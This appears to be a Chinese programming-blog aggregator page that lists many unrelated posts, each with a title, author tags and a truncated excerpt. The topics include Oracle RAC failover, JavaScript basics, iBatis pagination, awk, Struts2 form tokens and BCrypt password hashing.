转自：http://www.douban.com/note/211369821/ 学习jdk源码时使用-- 学习java最好的办法就是看jdk源代码，面对浩瀚的jdk（光源码就有40M多，比一个大型网站的源码都多）从何入手呢，要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。可惜的是sun提供的jdk并不能查看运行中的局部变量
Oracle RAC Failover 详解 aijuans oracle
Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用，连接到故障节点的用户会被自动转移到健康节点，从用户感受而言，是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种： 1. Client-Si
form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScript tomcat 浏览器互联网 servlet
原帖地址：http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器，get和post,分别说下吧。（一）get提交 1.首先说下客户端（浏览器）的form表单用get方法是如何将数据编码后提交给服务器端的吧。对于get方法来说，都是把数据串联在请求的url后面作为参数，如：http://localhost:
JS初学者必知的基础百合不是茶 js函数 js入门基础
JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言，它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。许多 HTML 开发者都不是程序员，但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
iBatis的分页分析与详解 bijian1013 java ibatis
分页是操作数据库型系统常遇到的问题。分页实现方法很多，但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分，发现返回的PaginatedList实际上是个接口，实现这个接口的是PaginatedDataList类的对象，查看PaginatedDataList类发现，每次翻页的时候最
精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle 数据库 plsql
/* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
【Linux命令二】文本处理命令awk bit1129 linux命令
awk是Linux用来进行文本处理的命令，在日常工作中，广泛应用于日志分析。awk是一门解释型编程语言，包含变量，数组，循环控制结构，条件控制结构等。它的语法采用类C语言的语法。 awk命令用来做什么？ 1.awk适用于具有一定结构的文本行，对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理，然后把直接结构返回给awk 3.awk实际工
JAVA(ssh2框架)+Flex实现权限控制方案分析白糖_ java
目前项目使用的是Struts2+Hibernate+Spring的架构模式，目前已经有一套针对SSH2的权限系统，运行良好。但是项目有了新需求：在目前系统的基础上使用Flex逐步取代JSP，在取代JSP过程中可能存在Flex与JSP并存的情况，所以权限系统需要进行修改。【SSH2权限系统的实现机制】权限控制分为页面和后台两块：不同类型用户的帐号分配的访问权限是不同的，用户使
angular.forEach boyitech AngularJS AngularJS API angular.forEach
angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象，key是obj的property key或者是数组的index，value就是相应的值啦. (此函数不能够迭代继承的属性.)
java-谷歌面试题-给定一个排序数组，如何构造一个二叉排序树 bylijinnan 二叉排序树
import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组，如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
action执行2次 Chen.H JavaScript jsp XHTML css Webwork
xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
[时空与能量]逆转时空需要消耗大量能源 comsci 能源
无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越..... 在进行时空穿梭的实验中,消耗超大规模的能源是必然
oracle的正则表达式(regular expression)详细介绍 daizj oracle 正则表达式
正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入，好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。正则表达式中常用到的元数据(metacharacter)如下： ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
报表工具与报表性能的关系 datamachine 报表工具 birt 报表性能润乾报表
在选择报表工具时，性能一直是用户关心的指标，但是，报表工具的性能和整个报表系统的性能有多大关系呢？要回答这个问题，首先要分析一下报表的处理过程包含哪些环节，哪些环节容易出现性能瓶颈，如何优化这些环节。一、报表处理的一般过程分析 1、用户选择报表输入参数后，报表引擎会根据报表模板和输入参数来解析报表，并将数据计算和读取请求以SQL的方式发送给数据库。 2、
初一上学期难记忆单词背诵第一课 dcj3sjt126com word english
what 什么 your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级，课 six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
我学过和准备学的各种技术 dcj3sjt126com 技术
语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html
struts2中token防止重复提交表单蕃薯耀重复提交表单 struts2中token
struts2中token防止重复提交表单 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
线性查找二维数组 hao3100590 二维数组
1.算法描述有序（行有序，列有序，且每行从左至右递增，列从上至下递增）二维数组查找，要求复杂度O(n) 2.使用到的相关知识：结构体定义和使用，二维数组传递（http://blog.csdn.net/yzhhmhm/article/details/2045816） 3.使用数组名传递这个的不便之处很明显，一旦确定就是不能设置列值 //使
spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
spring security 3中推荐使用BCrypt算法加密密码了，以前使用的是md5， Md5PasswordEncoder 和 ShaPasswordEncoder，现在不推荐了，推荐用bcrpt Bcrpt中的salt可以是随机的，比如： int i = 0; while (i < 10) { String password = "1234
学习编程并不难,做到以下几点即可! lampcy java html 编程语言
不论你是想自己设计游戏，还是开发iPhone或安卓手机上的应用，还是仅仅为了娱乐，学习编程语言都是一条必经之路。编程语言种类繁多，用途各异，然而一旦掌握其中之一，其他的也就迎刃而解。作为初学者，你可能要先从Java或HTML开始学，一旦掌握了一门编程语言，你就发挥无穷的想象，开发各种神奇的软件啦。 1、确定目标学习编程语言既充满乐趣，又充满挑战。有些花费多年时间学习一门编程语言的大学生到
架构师之mysql----------------用group+inner join,left join ,right join 查重复数据（替代in) nannan408 right join
1.前言。如题。 2.代码 (1)单表查重复数据,根据a分组 SELECT m.a,m.b, INNER JOIN （select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a （2）多表查询，使用改为le
jQuery选择器小结 VS 节点查找（附css的一些东西） Everyday都不同 jquery css name选择器追加元素查找节点
最近做前端页面，频繁用到一些jQuery的选择器，所以特意来总结一下：测试页面： <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
关于EXT tntxia ext
ExtJS是一个很不错的Ajax框架，可以用来开发带有华丽外观的富客户端应用，使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写，与后台技术无关的前端ajax框架。因此，可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。 ExtJs最开始基于YUI技术，由开发人员Jack
一个MIT计算机博士对数学的思考 xjnine Math
在过去的一年中，我一直在数学的海洋中游荡，research进展不多，对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界？作为计算机的学生，我没有任何企图要成为一个数学家。我学习数学的目的，是要想爬上巨人的肩膀，希望站在更高的高度，能把我自己研究的东西看得更深广一些。说起来，我在刚来这个学校的时候，并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目，是对appe